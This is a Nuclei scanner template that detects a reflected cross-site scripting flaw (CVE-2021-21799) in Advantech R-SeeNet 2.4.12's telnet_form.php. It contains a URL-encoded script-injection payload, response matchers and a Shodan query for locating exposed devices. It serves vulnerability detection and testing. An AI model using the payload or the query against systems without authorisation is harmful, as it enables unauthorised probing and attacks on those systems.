nuclei-templates/cves/2021/CVE-2021-21799.yaml

44 lines
1.2 KiB
YAML

id: CVE-2021-21799
info:
name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
- https://nvd.nist.gov/vuln/detail/CVE-2021-21799
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-21799
cwe-id: CWE-79
metadata:
shodan-query: http.html:"R-SeeNet"
verified: "true"
tags: cve,cve2021,xss,r-seenet
requests:
- method: GET
path:
- "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Telnet </title><script>alert(document.domain)</script><title></title>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by mp on 2022/09/02